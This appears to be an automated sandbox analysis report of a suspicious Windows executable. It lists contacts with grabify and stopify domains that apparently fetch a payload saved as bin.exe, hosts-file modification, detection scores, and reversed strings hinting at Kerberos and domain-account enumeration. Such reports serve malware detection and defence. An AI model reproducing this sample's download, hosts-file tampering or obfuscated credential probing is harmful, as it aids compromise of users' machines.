Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /news.php?tid=JBB69H.jpg HTTP/1.1User-Agent: MyAppHost: stopify.coCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /news.php?tid=JBB69H.jpg HTTP/1.1User-Agent: MyAppCache-Control: no-cacheHost: grabify.worldConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /news.php?tid=JBB69H.jpg HTTP/1.1User-Agent: MyAppCache-Control: no-cacheConnection: Keep-AliveHost: grabify.link
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: MyAppCache-Control: no-cacheConnection: Keep-AliveHost: google.com
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-afg1iOmL2n35A4yTbBqzqNKMrw11J0yadIqqCBxJ8xaVvZTgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1User-Agent: MyAppCache-Control: no-cacheConnection: Keep-AliveHost: www.google.comCookie: NID=513=H1RAwZMpbccP2MupfzVClLXvboj2k_4nyM1TDtjKSCFjsE7EiTXH9bwLa77-PG9rFOQLO1-g_QxGqzQ3X6qDivIZpRs6mZysq9oxrD3VPUUav5jdQzsmUXuWYf1dyfAzzncyChxc77K4MzSt1SRaCs54NHbaLRz1tZDj5AKJbP8
Source: unknownDNS traffic detected: queries for: stopify.co
Source: IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-afg1iOmL2n35A4yTbBqzqNKMrw11J0yadIqqCBxJ8xaV
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/7
Source: IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com1
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/.
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/B
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/sorry/index?continue=http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-a
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/ws.php?tid=JBB69H.jpg
Source: IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.$
Source: IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.link/
Source: IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.link/(
Source: IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.link/F
Source: IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023899869.0000000000A27000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A21000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A67000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.link/news.php?tid=JBB69H.jpg
Source: IPrstVM17M.exe, 00000000.00000003.2023792145.0000000000A67000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.link/news.php?tid=JBB69H.jpgH
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.link/news.php?tid=JBB69H.jpgw
Source: IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.world/
Source: IPrstVM17M.exe, 00000000.00000003.1992051508.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.world/news.php?tid=JBB69H.jpg
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.world/news.php?tid=JBB69H.jpg:
Source: IPrstVM17M.exe, 00000000.00000003.2002690521.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023792145.0000000000A65000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000003.2023589857.0000000000A26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grabify.world/news.php?tid=JBB69H.jpgw
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stopify.co/
Source: IPrstVM17M.exe, bin.exe.3.drString found in binary or memory: https://stopify.co/news.php?tid=JBB69H.jpg
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stopify.co/news.php?tid=JBB69H.jpg%
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://stopify.co/news.php?tid=JBB69H.jpgm
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownHTTPS traffic detected: 52.173.151.229:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.161.186:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.26.8.202:443 -> 192.168.2.5:49707 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

barindex
Modifies the hosts file
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeProcess Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\IPrstVM17M.exeCode function: String function: 00207BE0 appears 38 times
Source: C:\Users\user\Desktop\IPrstVM17M.exeCode function: String function: 00207E40 appears 373 times
Source: IPrstVM17M.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal64.adwa.evad.winEXE@16/4@5/5
Source: C:\Users\user\Desktop\IPrstVM17M.exeCode function: 0_2_00201F90 CreateToolhelp32Snapshot,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,Process32FirstW,CloseHandle,Process32NextW,_invalid_parameter_noinfo_noreturn,CloseHandle,0_2_00201F90
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6164:120:WilError_03
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\bin.exeJump to behavior
Source: IPrstVM17M.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\IPrstVM17M.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: IPrstVM17M.exeReversingLabs: Detection: 15%
Source: IPrstVM17M.exeVirustotal: Detection: 14%
Source: IPrstVM17M.exeString found in binary or memory: https://stopify.co/news.php?tid=JBB69H.jpg
Source: IPrstVM17M.exeString found in binary or memory: https://stopify.co/news.php?tid=JBB69H.jpg
Source: IPrstVM17M.exeString found in binary or memory: @Unknown exceptionbad array new lengthstring too longbad castFailed to create process snapshot.Failed to retrieve first process.MyApphttps://stopify.co/news.php?tid=JBB69H.jpg Failed to open URL. Error code: Failed to initialize WinINet. Error code: Error: Unable to open file Error: Unable to open file for writing: Text appended to executable successfully./tsoHbrKdetcirtseR))2918=:308.4.1.655311.048.2.1:lortnoCtnuoccAresu()retupmoc=ssalCtcejbo()retupmoc=yrogetaCtcejbo(&(dleiFgnikcaB__k>npU<)+]}0{[(|)$+.*]}0{[(dleiFgnikcaB__k>mlaer<YTIROHTUA_REIFITNEDI_DIS_CPR_ofnInogoLniamoDnigoLdnAlacigoLpOepytyalpsiDecruoseRnoisseSnogoLgnitanigirOdleiFgnikcaB__k>stekcit<YTIRGETNI_OFNI_NEKOT_PASLdleiFgnikcaB__k>muskcehc<etacifitreCrevreSyfireV_teg}} }1{ = eulav ,}0{ = xedni {{dleiFgnikcaB__k>emaNniamoDsnD<dleiFgnikcaB__k>epyTnoitpyrcnE<dleiFgnikcaB__k>yeKcilbuPtcejbuS<dmctnirptratSnoitcellocdetroppusnu sirotareneG.emirP.htaM.onoMsgratnirpffogoltsalecnoNrevres5.2.4.3.101.1.048.61.2dleiFgnikcaB__k>edoc_rorre<DROWSSAP_ERIPXE_TNODEGNAHC_TNAC_DWSSAPrepleHreffuBceSelpitluMyarrAsetyBreffuBcesnoitcelloCrellortnoCniamoDegAdrowssaPmuminiMegAdrowssaPmumixaMepyTsserddArellortnoCniamoDsserddArellortnoCniamoDtsrif snmuloc eht tes esaelP1__b>shtgneLnmuloC<reifitnedIyrotceriDpadLkcabllaCetacifitreCrevreSyfireVemittrats_tegemittrats_tes0_etirW1_etirW2_etirW74.1.4.3.101.1.048.61.272.1.4.3.101.1.048.61.27.1.4.3.101.1.048.61.2pmatsemitnogoltsalnogoltsal2__b>yeKetavirProFniPteS<1__b>yeKetavirProFniPteS<0__b>yeKetavirProFniPteS<eldnaHredivorPotpyrCyeKetavirProFniPteSevirDyrotceriDemoHemaNniamoDnogoLtpircSnogoLemiTffogoLtnuoCnogoLreussillac-noitcurtsnidloh-ditcejer-noitcurtsnidloh-dienon-noitcurtsnidloh-di652ahs-htiw-asd-di422ahs-htiw-asd-ditnuoCtniopdnEqestorPcpRREIFITNEDI_XATNYS_CPRECAFRETNI_REVRES_CPRTNIOPDNE_QESTORP_CPRELBAT_HCTAPSID_CPRtniopdnEqestorPcpRtnuoCelbaThctapsiDOFNI_REVRES_LDIM1.3.2.5.1.6.3.1NWONKNU_SUTATS_NOITACOVER_RRE_CDKDERIUQER_RESU_OT_RESU_RRE_PA_BRKETACIFITREC_YFIREV_TNAC_RRE_CDKHCTAMSIM_EMAN_TNEILC_RRE_CDKEUQINU_TON_LAPICNIRP_RRE_CDKTSEUQER_EHCAC_TKT_YREUQ_BREKNWONKNU_LAPICNIRP_C_RRE_CDKTNUOCCA_TSURT_REVRESdleiFgnikcaB__k>stnetnoc<3.2.04001.048.2.12.2.04001.048.2.11.2.04001.048.2.184.1.4.3.101.1.048.61.282.1.4.3.101.1.048.61.28.1.4.3.101.1.048.61.2sepytnoitpyrcnedetroppus-sdsmdetaercnehwytitnedIrehtOfOflaheBnOtcAoTdewollA-SDsmslapicnirPytiruceSngieroF=NCstnuoccA ecivreS deganaM=NCsrellortnoC niamoD=UOlortnoctnuoccaresumetsySCetacoLDC no rorrE}3,1{d\}3{).\}3,1{d\(|}4,1{]f-aF-A9-0[}7{):}4,1{]f-aF-A9-0[(mrof lamiced ro xeh a ni ton si eulav gnirts DIUL dessaP.0 naht retaerg eb tsum 'snmuloc' - )(tilpS ]RORRE[gnirtSeniLelgnis - )(tilpS ]RORRE[}0{ : emaNresU}0{ : niamoD}0{ : epyTnogoL}0{ : dInogoL}0{ : revreSnogoL}0{ : niamoDSNDrevreSnogoL}0{ : egakcaPnoitacitnehtuA}0{ : emaNlapicnirPresU}0{ : DISresU/,,,,,,(Fvo*V&<`?*V'@g?+W&8U/+W(Fv?*V0.0.1v xEresufnoCredoc
Source: IPrstVM17M.exeString found in binary or memory: @Unknown exceptionbad array new lengthstring too longbad castFailed to create process snapshot.Failed to retrieve first process.MyApphttps://stopify.co/news.php?tid=JBB69H.jpg Failed to open URL. Error code: Failed to initialize WinINet. Error code: Error: Unable to open file Error: Unable to open file for writing: Text appended to executable successfully./tsoHbrKdetcirtseR))2918=:308.4.1.655311.048.2.1:lortnoCtnuoccAresu()retupmoc=ssalCtcejbo()retupmoc=yrogetaCtcejbo(&(dleiFgnikcaB__k>npU<)+]}0{[(|)$+.*]}0{[(dleiFgnikcaB__k>mlaer<YTIROHTUA_REIFITNEDI_DIS_CPR_ofnInogoLniamoDnigoLdnAlacigoLpOepytyalpsiDecruoseRnoisseSnogoLgnitanigirOdleiFgnikcaB__k>stekcit<YTIRGETNI_OFNI_NEKOT_PASLdleiFgnikcaB__k>muskcehc<etacifitreCrevreSyfireV_teg}} }1{ = eulav ,}0{ = xedni 